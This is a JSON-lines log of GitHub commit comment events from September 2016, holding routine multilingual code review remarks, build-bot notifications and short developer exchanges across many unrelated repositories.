{"id":"4623420511","type":"CommitCommentEvent","actor":{"login":"jmgnve"},"repo":{"name":"jmgnve/nve-git-intro"},"payload":{"comment":{"id":19188450,"position":5,"line":28,"path":"README.md","commit_id":"5a05c375bf8cbcc8d42644792297685eb7a340ee","created_at":"2016-09-27T10:55:11Z","updated_at":"2016-09-27T10:55:11Z","body":"Very nice commit"}},"created_at":"2016-09-27T10:55:11Z"}
{"id":"4623423208","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188457,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T10:55:45Z","updated_at":"2016-09-27T10:55:45Z","body":"@Too-Naive "}},"created_at":"2016-09-27T10:55:45Z"}
{"id":"4623423846","type":"CommitCommentEvent","actor":{"login":"chuan16"},"repo":{"name":"chuan16/pine"},"payload":{"comment":{"id":19188461,"position":null,"line":null,"path":null,"commit_id":"c0f4832392ce85801663b5c01158f9b43a78312d","created_at":"2016-09-27T10:55:55Z","updated_at":"2016-09-27T10:55:55Z","body":"lis3dh driver draft done, may need slim"}},"created_at":"2016-09-27T10:55:55Z"}
{"id":"4623423847","type":"CommitCommentEvent","actor":{"login":"volumio"},"repo":{"name":"volumio/Build"},"payload":{"comment":{"id":19188460,"position":null,"line":null,"path":null,"commit_id":"5409190efbfacefe0c21b95a48b268921cc45516","created_at":"2016-09-27T10:55:55Z","updated_at":"2016-09-27T10:55:55Z","body":"Done here \r\nhttps://github.com/volumio/Build/commit/ae7770d0cb143b9c825daee406db76df81b72738"}},"created_at":"2016-09-27T10:55:55Z"}
{"id":"4623426199","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188466,"position":null,"line":null,"path":null,"commit_id":"801406d6891c6e873b4e20656044ba5a53a3ce81","created_at":"2016-09-27T10:56:24Z","updated_at":"2016-09-27T10:56:24Z","body":"@Too-Naive "}},"created_at":"2016-09-27T10:56:24Z"}
{"id":"4623426334","type":"CommitCommentEvent","actor":{"login":"soul2zimate"},"repo":{"name":"jboss-set/zeus"},"payload":{"comment":{"id":19188467,"position":4,"line":105,"path":"hosts.yml","commit_id":"51b8720f938316fd2c2315b22e6069b13a936a88","created_at":"2016-09-27T10:56:26Z","updated_at":"2016-09-27T10:56:26Z","body":"sorry about nitpick: Should not the script name with .sh at the end for consistency as above ones ? "}},"created_at":"2016-09-27T10:56:26Z"}
{"id":"4623436723","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"jamesbascle/OneOf"},"payload":{"comment":{"id":19188506,"position":null,"line":null,"path":null,"commit_id":"ddfaba62ca2210c47bee4411b354ccc52d015156","created_at":"2016-09-27T10:58:41Z","updated_at":"2016-09-27T10:58:41Z","body":"I like it, you've neatly hidden away options that aren't valid.  And you've reminded me that it's possible to do pretty neat things with generics and interfaces!  I'll merge your changes in tomorrow, when I'm less likely to end up turning the project into soup!\r\n\r\nYou've got me aching to see how much further I could twist and bend your ideas!  \r\n\r\nps. 15 mins to midnight is not a good time for me to be reviewing that code!  =)  \r\n"}},"created_at":"2016-09-27T10:58:41Z"}
{"id":"4623438386","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"Bauuuuu/android_build"},"payload":{"comment":{"id":19188509,"position":62,"line":790,"path":"core/Makefile","commit_id":"cb0872073947f02c2ff808f22afdb028b1fd7a39","created_at":"2016-09-27T10:59:02Z","updated_at":"2016-09-27T10:59:02Z","body":"YAFFS is so 2012, you can skip it out happily."}},"created_at":"2016-09-27T10:59:02Z"}
{"id":"4623440250","type":"CommitCommentEvent","actor":{"login":"user1234567891011"},"repo":{"name":"Novik/ruTorrent"},"payload":{"comment":{"id":19188516,"position":null,"line":null,"path":null,"commit_id":"7c68afc5587f5c9e142f87482a97e2d075a59d6f","created_at":"2016-09-27T10:59:27Z","updated_at":"2016-09-27T10:59:27Z","body":"Did this by chance remove the \"Save to\" option from the right click menu? After updating I no longer have this option..."}},"created_at":"2016-09-27T10:59:27Z"}
{"id":"4623440644","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/SimpleParser"},"payload":{"comment":{"id":19188517,"position":67,"line":67,"path":"HabrParser/Program.cs","commit_id":"7e54737470ef2b25bbf81958fec255d87990f33b","created_at":"2016-09-27T10:59:33Z","updated_at":"2016-09-27T10:59:33Z","body":"Лучше не реализовывать логику на Exception, это очень дорогая операция. Для твоей цели есть Int32.tryParse"}},"created_at":"2016-09-27T10:59:33Z"}
{"id":"4623443854","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19188521,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-27T11:00:14Z","updated_at":"2016-09-27T11:00:14Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.181](http://build.clear-measure.com/viewLog.html?buildId=10725&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-27T11:00:14Z"}
{"id":"4623445244","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/SimpleParser"},"payload":{"comment":{"id":19188525,"position":117,"line":117,"path":"HabrParser/Program.cs","commit_id":"7e54737470ef2b25bbf81958fec255d87990f33b","created_at":"2016-09-27T11:00:30Z","updated_at":"2016-09-27T11:00:30Z","body":"Вот так вообще делать не надо, если ловишь Exception, то обрабатывай его как-то,  не глуши."}},"created_at":"2016-09-27T11:00:30Z"}
{"id":"4623448597","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19188536,"position":6,"line":6,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.h","commit_id":"42428b98da9e42b678b7486c8f082566f291345b","created_at":"2016-09-27T11:01:13Z","updated_at":"2016-09-27T11:01:13Z","body":"Впрочем, да, нам и не нужно запоминать эту строку. Убрал копирование здесь."}},"created_at":"2016-09-27T11:01:13Z"}
{"id":"4623451424","type":"CommitCommentEvent","actor":{"login":"adrientetar"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19188545,"position":null,"line":null,"path":null,"commit_id":"064932e2e6557852d311f901e3c798cca8e34174","created_at":"2016-09-27T11:01:53Z","updated_at":"2016-09-27T11:01:53Z","body":"> 1) bdist creates a so-called \"dumb\" distribution package, which is now deprecated by the Python Packaging Authority. I can point you to relevant discussions on the distutils-sig mailing list. I suggest we replace bdist with bdist_wheel.\r\n\r\n> 1) the install target uses the old-fashioned setup.py install, which will use setuptools's easy_install and will create and install an *.egg package. The use of eggs and easy_install is being discouraged in favour of wheels and pip. So the recommended way to install from a source distribution would be pip install ., rather than python setup.py install.\r\n\r\nsgtm. can you do the changes?"}},"created_at":"2016-09-27T11:01:53Z"}
{"id":"4623451930","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188547,"position":null,"line":null,"path":null,"commit_id":"2cbb7744df771db94cdb6d9214cc653d957bf997","created_at":"2016-09-27T11:01:58Z","updated_at":"2016-09-27T11:01:58Z","body":"已经解析至谷歌中国且无DNS污染\r\nnslookup不要无脑用国外的DNS\r\n(这也算一个奇怪的commit…)"}},"created_at":"2016-09-27T11:01:58Z"}
{"id":"4623454055","type":"CommitCommentEvent","actor":{"login":"sadovnik"},"repo":{"name":"electricSemyon/vk-intersect"},"payload":{"comment":{"id":19188549,"position":6,"line":6,"path":"tests/intersectionTest.js","commit_id":"2d345f0fcc949a7a7bfbcf5604bf48c14f74b0e2","created_at":"2016-09-27T11:02:27Z","updated_at":"2016-09-27T11:02:27Z","body":"Why these arrays are here? Would be better it you put them under inside `it`."}},"created_at":"2016-09-27T11:02:27Z"}
{"id":"4623454060","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":19188550,"position":null,"line":null,"path":null,"commit_id":"064932e2e6557852d311f901e3c798cca8e34174","created_at":"2016-09-27T11:02:27Z","updated_at":"2016-09-27T11:02:27Z","body":"yes, working on it now"}},"created_at":"2016-09-27T11:02:27Z"}
{"id":"4623454504","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/middleware"},"payload":{"comment":{"id":19188552,"position":4,"line":1354,"path":"src/dispatcher/plugins/DiskPlugin.py","commit_id":"864672e19194ed600377c0909410803d6ca1ecb6","created_at":"2016-09-27T11:02:34Z","updated_at":"2016-09-27T11:02:34Z","body":"This is not needed and redundant with information collected at runtime, so I suggest removing description from database as well as from the top-level schema."}},"created_at":"2016-09-27T11:02:34Z"}
{"id":"4623455255","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"4poKer/SimpleParser"},"payload":{"comment":{"id":19188555,"position":160,"line":160,"path":"HabrParser/Program.cs","commit_id":"7e54737470ef2b25bbf81958fec255d87990f33b","created_at":"2016-09-27T11:02:47Z","updated_at":"2016-09-27T11:02:47Z","body":"Вообще не понял, зачем этот кусок. Тебе цикл нужно начинать с меню. и тогда когда у тебя все закончится, опять покажется меню."}},"created_at":"2016-09-27T11:02:47Z"}
{"id":"4623455470","type":"CommitCommentEvent","actor":{"login":"pldin601"},"repo":{"name":"sadovnik/converter"},"payload":{"comment":{"id":19188556,"position":11,"line":14,"path":"src/Converter.php","commit_id":"665e3b7744b859b6578863ce064b6c955e48882a","created_at":"2016-09-27T11:02:50Z","updated_at":"2016-09-27T11:02:50Z","body":"ну я это и имел в виду)"}},"created_at":"2016-09-27T11:02:50Z"}
{"id":"4623455545","type":"CommitCommentEvent","actor":{"login":"karelzak"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":19188558,"position":null,"line":null,"path":null,"commit_id":"949ea05f1af647834db24b9172ac006488d2e4f4","created_at":"2016-09-27T11:02:50Z","updated_at":"2016-09-27T11:02:50Z","body":"Fixed, thanks for review."}},"created_at":"2016-09-27T11:02:50Z"}
{"id":"4623456691","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19188563,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-27T11:03:08Z","updated_at":"2016-09-27T11:03:08Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.181](http://build.clear-measure.com/viewLog.html?buildId=10725&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:53"}},"created_at":"2016-09-27T11:03:08Z"}
{"id":"4623459864","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188568,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T11:03:50Z","updated_at":"2016-09-27T11:03:50Z","body":"趴】我怎麼知道啊\r\n你要跟他們講啊【趴 "}},"created_at":"2016-09-27T11:03:50Z"}
{"id":"4623462780","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188574,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T11:04:30Z","updated_at":"2016-09-27T11:04:30Z","body":"@aofall Google Analytics 貌似一直被广告拦截软件屏蔽着、、、\r\n对了，ajax.googleapis.com 解析到国内了吗？我上次没加这条，但没有显示连接错误。"}},"created_at":"2016-09-27T11:04:30Z"}
{"id":"4623463826","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188578,"position":6,"line":10,"path":"package.json","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:04:44Z","updated_at":"2016-09-27T11:04:44Z","body":"see npm start :)"}},"created_at":"2016-09-27T11:04:44Z"}
{"id":"4623466726","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188587,"position":null,"line":null,"path":null,"commit_id":"801406d6891c6e873b4e20656044ba5a53a3ce81","created_at":"2016-09-27T11:05:25Z","updated_at":"2016-09-27T11:05:25Z","body":"![](https://cloud.githubusercontent.com/assets/16496671/14747730/62dc54fc-08e8-11e6-8e09-12005c61b21b.jpg)"}},"created_at":"2016-09-27T11:05:25Z"}
{"id":"4623467547","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188589,"position":5,"line":19,"path":"themes/cerebral-website/page/page.css","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:05:37Z","updated_at":"2016-09-27T11:05:37Z","body":"tag selectors considered harmful in BEM"}},"created_at":"2016-09-27T11:05:37Z"}
{"id":"4623467971","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188590,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T11:05:42Z","updated_at":"2016-09-27T11:05:42Z","body":"因为merge的是你 @Too-Naive "}},"created_at":"2016-09-27T11:05:42Z"}
{"id":"4623467992","type":"CommitCommentEvent","actor":{"login":"BurntimeX"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19188591,"position":36,"line":74,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"93f79ece589101149e5fd133b534d8705c159ffc","created_at":"2016-09-27T11:05:42Z","updated_at":"2016-09-27T11:05:42Z","body":"it shrinks/clips larger avatars to 128x128"}},"created_at":"2016-09-27T11:05:42Z"}
{"id":"4623469149","type":"CommitCommentEvent","actor":{"login":"dtdesign"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19188596,"position":6,"line":521,"path":"wcfsetup/install/files/lib/system/WCFSetup.class.php","commit_id":"f5aa0bfd9e9d499b3287c30fa708794a17e20a47","created_at":"2016-09-27T11:05:59Z","updated_at":"2016-09-27T11:05:59Z","body":"No, because the slash doesn't alter the outcome at all, but adds a nice slash when installing in the doc root. Having an empty input field isn't that great imho."}},"created_at":"2016-09-27T11:05:59Z"}
{"id":"4623470168","type":"CommitCommentEvent","actor":{"login":"fbaffie"},"repo":{"name":"jmgnve/nve-git-intro"},"payload":{"comment":{"id":19188599,"position":5,"line":28,"path":"README.md","commit_id":"5a05c375bf8cbcc8d42644792297685eb7a340ee","created_at":"2016-09-27T11:06:13Z","updated_at":"2016-09-27T11:06:13Z","body":"Thanks! ;) \r\nI was wondering if we shouldn't include a small section on Rstudio integration at the end. I remember having to install git directly from https://git-scm.com/downloads in order to link the .exe file to the RStudio git option. This install also comes with a less ugly git bash that the one accompanying github desktop"}},"created_at":"2016-09-27T11:06:13Z"}
{"id":"4623471921","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188602,"position":1,"line":1,"path":"themes/cerebral-website/side-nav/side-nav.css","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:06:33Z","updated_at":"2016-09-27T11:06:33Z","body":"side-nav.css is for side-nav block only.\r\n"}},"created_at":"2016-09-27T11:06:33Z"}
{"id":"4623472451","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188604,"position":null,"line":null,"path":null,"commit_id":"7a4a4a18d67d5676ae314aa60831de133aba1e0d","created_at":"2016-09-27T11:06:41Z","updated_at":"2016-09-27T11:06:41Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 143](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1239&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-27T11:06:41Z"}
{"id":"4623475203","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":19188614,"position":36,"line":74,"path":"wcfsetup/install/files/lib/system/importer/UserAvatarImporter.class.php","commit_id":"93f79ece589101149e5fd133b534d8705c159ffc","created_at":"2016-09-27T11:07:17Z","updated_at":"2016-09-27T11:07:17Z","body":"I was talking about the try-catch specifically, because in the current state it's quite useless to catch an Exception, just to throw a new one."}},"created_at":"2016-09-27T11:07:17Z"}
{"id":"4623475867","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188615,"position":null,"line":null,"path":null,"commit_id":"7a4a4a18d67d5676ae314aa60831de133aba1e0d","created_at":"2016-09-27T11:07:26Z","updated_at":"2016-09-27T11:07:26Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 143](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1239&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:46"}},"created_at":"2016-09-27T11:07:26Z"}
{"id":"4623477664","type":"CommitCommentEvent","actor":{"login":"zhaoronghua"},"repo":{"name":"zhaoronghua/hello-world"},"payload":{"comment":{"id":19188619,"position":3,"line":3,"path":"README.md","commit_id":"39d9a7e500b59d66478f7f8d0c0001f2c7dc8654","created_at":"2016-09-27T11:07:50Z","updated_at":"2016-09-27T11:07:50Z","body":"i'm a freshman,i had learned C before"}},"created_at":"2016-09-27T11:07:50Z"}
{"id":"4623479814","type":"CommitCommentEvent","actor":{"login":"jmgnve"},"repo":{"name":"jmgnve/nve-git-intro"},"payload":{"comment":{"id":19188629,"position":5,"line":28,"path":"README.md","commit_id":"5a05c375bf8cbcc8d42644792297685eb7a340ee","created_at":"2016-09-27T11:08:18Z","updated_at":"2016-09-27T11:08:18Z","body":"I have a nice git command line tool which I think came directly with the “Git Desktop” installation from NVE Programvaresenter\r\n\r\nFra: Florian Kobierska Baffie [mailto:notifications@github.com]\r\nSendt: 27. september 2016 13:06\r\nTil: jmgnve/nve-git-intro <nve-git-intro@noreply.github.com>\r\nKopi: Magnusson Jan Olof <jmg@nve.no>; Comment <comment@noreply.github.com>\r\nEmne: Re: [jmgnve/nve-git-intro] minor change as test (5a05c37)\r\n\r\n\r\nThanks! ;)\r\nI was wondering if we shouldn't include a small section on Rstudio integration at the end. I remember having to install git directly from https://git-scm.com/downloads in order to link the .exe file to the RStudio git option. This install also comes with a less ugly git bash that the one accompanying github desktop\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/jmgnve/nve-git-intro/commit/5a05c375bf8cbcc8d42644792297685eb7a340ee#commitcomment-19188599>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ASvHb8jGOhh8q31sctBxTCrFmgkgDseWks5quPilgaJpZM4KHhoQ>.\r\n"}},"created_at":"2016-09-27T11:08:18Z"}
{"id":"4623480066","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188630,"position":38,"line":35,"path":"js/script.js","commit_id":"52f7db694aaea040c4fc1a308bd086f3ef02a5fc","created_at":"2016-09-27T11:08:22Z","updated_at":"2016-09-27T11:08:22Z","body":"nie deklaruj zmiennych po przecinku, tylko każdy od nowej linijki + `var`"}},"created_at":"2016-09-27T11:08:22Z"}
{"id":"4623481524","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188635,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T11:08:41Z","updated_at":"2016-09-27T11:08:41Z","body":"@Too-Naive 我来改，正好hosts还有一条重复的，顺便删了"}},"created_at":"2016-09-27T11:08:41Z"}
{"id":"4623481735","type":"CommitCommentEvent","actor":{"login":"neangkakada"},"repo":{"name":"mocdk/MOC.ImageOptimizer"},"payload":{"comment":{"id":19188636,"position":23,"line":41,"path":"README.md","commit_id":"04abcec2b2264a1c847f8116c41991c7719e5e06","created_at":"2016-09-27T11:08:44Z","updated_at":"2016-09-27T11:08:44Z","body":"After I run composer, the package moc/imageoptimizer appear in Application folder, so should change it to:\r\nnpm install --prefix Packages/Application/MOC.ImageOptimizer/Resources/Private/Library"}},"created_at":"2016-09-27T11:08:44Z"}
{"id":"4623483215","type":"CommitCommentEvent","actor":{"login":"alvin93li"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19188640,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-27T11:09:04Z","updated_at":"2016-09-27T11:09:04Z","body":"thx"}},"created_at":"2016-09-27T11:09:04Z"}
{"id":"4623484875","type":"CommitCommentEvent","actor":{"login":"LethalGhost"},"repo":{"name":"animusdev/Old-World-Blue"},"payload":{"comment":{"id":19188643,"position":null,"line":null,"path":null,"commit_id":"9d4d240a2efad70e6768300cfb2b228494ab1d7d","created_at":"2016-09-27T11:09:28Z","updated_at":"2016-09-27T11:09:28Z","body":"icons/mob/hair.dmi - волосы людей.\r\nhair_alien.dmi - все волосы/прочее для ксеносов.\r\nhair_facial.dmi - бороды людей.\r\n\r\nТаки, волосы таяр я уже взял, да (код тоже)."}},"created_at":"2016-09-27T11:09:28Z"}
{"id":"4623485089","type":"CommitCommentEvent","actor":{"login":"Duckstein"},"repo":{"name":"Duckstein/hello-world"},"payload":{"comment":{"id":19188646,"position":1,"line":1,"path":"README.md","commit_id":"1575c55a298653690a9b3a4210ff5fadedc98d72","created_at":"2016-09-27T11:09:30Z","updated_at":"2016-09-27T11:09:30Z","body":"this is a comment..."}},"created_at":"2016-09-27T11:09:30Z"}
{"id":"4623487197","type":"CommitCommentEvent","actor":{"login":"garpinc"},"repo":{"name":"pac4j/spring-security-pac4j"},"payload":{"comment":{"id":19188652,"position":null,"line":null,"path":null,"commit_id":"2d0d5923c0a9a60e000261e12c96947374399dc5","created_at":"2016-09-27T11:09:58Z","updated_at":"2016-09-27T11:09:58Z","body":"The felix stuff I added was what created manifest. It's no longer there and now there is no bundle info in release manifest"}},"created_at":"2016-09-27T11:09:58Z"}
{"id":"4623488835","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188656,"position":null,"line":null,"path":null,"commit_id":"801406d6891c6e873b4e20656044ba5a53a3ce81","created_at":"2016-09-27T11:10:18Z","updated_at":"2016-09-27T11:10:18Z","body":"@andytimes "}},"created_at":"2016-09-27T11:10:18Z"}
{"id":"4623490677","type":"CommitCommentEvent","actor":{"login":"aofall"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19188661,"position":null,"line":null,"path":null,"commit_id":"2cc67731a7f7b25140cb557d1c87d9966811de3c","created_at":"2016-09-27T11:10:42Z","updated_at":"2016-09-27T11:10:42Z","body":"@andytimes"}},"created_at":"2016-09-27T11:10:42Z"}
{"id":"4623494505","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188664,"position":122,"line":119,"path":"js/script.js","commit_id":"52f7db694aaea040c4fc1a308bd086f3ef02a5fc","created_at":"2016-09-27T11:11:31Z","updated_at":"2016-09-27T11:11:31Z","body":"zamiast wyżej przy conditionalu decydować o wartości zmiennej `winnerIs`, a teraz tutaj jeszcze raz ją sprawdzać, to zrób sobie funkcje pomocnicze dla remisu, wygranej gracza i i wygranej komputera i od razu je tutaj wołaj."}},"created_at":"2016-09-27T11:11:31Z"}
{"id":"4623494551","type":"CommitCommentEvent","actor":{"login":"Nagarei"},"repo":{"name":"Nagarei/DxLibEx"},"payload":{"comment":{"id":19188665,"position":null,"line":null,"path":null,"commit_id":"4b35178066249ef3d5623920ef48aea9e5cc095f","created_at":"2016-09-27T11:11:31Z","updated_at":"2016-09-27T11:11:31Z","body":"うーん。\r\n迷うところですが、あえて入れる理由もないかなと思います。\r\nポインタ系ではないですし。\r\n(stream系にあるのはCのFILE*と合わせるためと認識しています）"}},"created_at":"2016-09-27T11:11:31Z"}
{"id":"4623494736","type":"CommitCommentEvent","actor":{"login":"tautology0"},"repo":{"name":"sullo/nikto"},"payload":{"comment":{"id":19188666,"position":null,"line":null,"path":null,"commit_id":"d9ba417adc0c13b1e24ab45ad7b98814bd1336bf","created_at":"2016-09-27T11:11:34Z","updated_at":"2016-09-27T11:11:34Z","body":"Fix for #421 "}},"created_at":"2016-09-27T11:11:34Z"}
{"id":"4623494982","type":"CommitCommentEvent","actor":{"login":"Zeratul000"},"repo":{"name":"mwindey/ToysForBoys"},"payload":{"comment":{"id":19188669,"position":null,"line":null,"path":null,"commit_id":"e78b96ce04d908d62ba8f91316be2bf526006135","created_at":"2016-09-27T11:11:37Z","updated_at":"2016-09-27T11:11:37Z","body":"Is used in the WPF so deleting it creates very serious build errors, for those working on DAL (BUILD YOUR PROJECT)"}},"created_at":"2016-09-27T11:11:37Z"}
{"id":"4623496782","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188672,"position":4,"line":3,"path":"themes/cerebral-website/head-nav/head-nav.css","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:12:02Z","updated_at":"2016-09-27T11:12:02Z","body":"why it so small?"}},"created_at":"2016-09-27T11:12:02Z"}
{"id":"4623498737","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188675,"position":5,"line":19,"path":"themes/cerebral-website/page/page.css","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:12:27Z","updated_at":"2016-09-27T11:12:27Z","body":"There is a `link` block"}},"created_at":"2016-09-27T11:12:27Z"}
{"id":"4623505912","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19188692,"position":40,"line":245,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-27T11:13:59Z","updated_at":"2016-09-27T11:13:59Z","body":"I've merged this Speed Units with the temperature Units, and they are based on the API request location, so they should change according to the ForecastIO Form->Advanced->Units option"}},"created_at":"2016-09-27T11:13:59Z"}
{"id":"4623508022","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/spark.rstudio.com"},"payload":{"comment":{"id":19188694,"position":null,"line":null,"path":null,"commit_id":"13865c34d938020795ce47307b5912665febb691","created_at":"2016-09-27T11:14:26Z","updated_at":"2016-09-27T11:14:26Z","body":"@ledell I removed the logistic regression example for the time being because it was using a data workflow that, while valid, is out of band with the model we are articulating. i.e. it was doing data manipulation in base R (not something you'd ever do for a large dataset) then copying the dataset directly to H2O (bypassing Hive and thus the ability to do data manipulation using dplyr and see the dataset within RStudio).\r\n\r\nIf we could re-write the example to use `copy_to` and then dplyr for the factor work, then finally call `as_h2o_frame` that would be great.\r\n\r\nI also modified the use of the `beaver` dataset to call spark_read_csv rather than copying directly to H2O.\r\n"}},"created_at":"2016-09-27T11:14:26Z"}
{"id":"4623509497","type":"CommitCommentEvent","actor":{"login":"MWBASF"},"repo":{"name":"sigveka/MoDeNa"},"payload":{"comment":{"id":19188698,"position":null,"line":null,"path":null,"commit_id":"38904cd8f748155ad1f39f2c7002252c3dcb370d","created_at":"2016-09-27T11:14:46Z","updated_at":"2016-09-27T11:14:46Z","body":"I assume the changes for initModels1 would require an update for initModels2 as well? "}},"created_at":"2016-09-27T11:14:46Z"}
{"id":"4623512877","type":"CommitCommentEvent","actor":{"login":"helperhaps"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19188704,"position":null,"line":null,"path":null,"commit_id":"fb42c492a7eff58f45867ea50440d938648cdb48","created_at":"2016-09-27T11:15:27Z","updated_at":"2016-09-27T11:15:27Z","body":"@pixeltrix Thanks for your comment"}},"created_at":"2016-09-27T11:15:27Z"}
{"id":"4623518355","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19188713,"position":154,"line":151,"path":"js/script.js","commit_id":"52f7db694aaea040c4fc1a308bd086f3ef02a5fc","created_at":"2016-09-27T11:16:46Z","updated_at":"2016-09-27T11:16:46Z","body":"To ustaliliśmy na rozmowie - uprościć ten ternary lub się go pozbyć. Wyrzucić stąd `setGameElements`. Zmienić nazewnictwo na bardziej opisowe i rozbić funkcje. Ja bym zrobił tak:\r\n\r\n- zrobił funkcje `didGameEnd`, która zwróci tylko true or false na podstawie tego czy, któryś score przebił 10.\r\n- zrobił funkcje `getWinner`, która zwróci zwycięzcę.\r\n\r\nMając te dwie funkcje, w linijce #128 możemy dać pięknie, opisowo:\r\n\r\n`if (didGameEnd) { getWinner() }`"}},"created_at":"2016-09-27T11:16:46Z"}
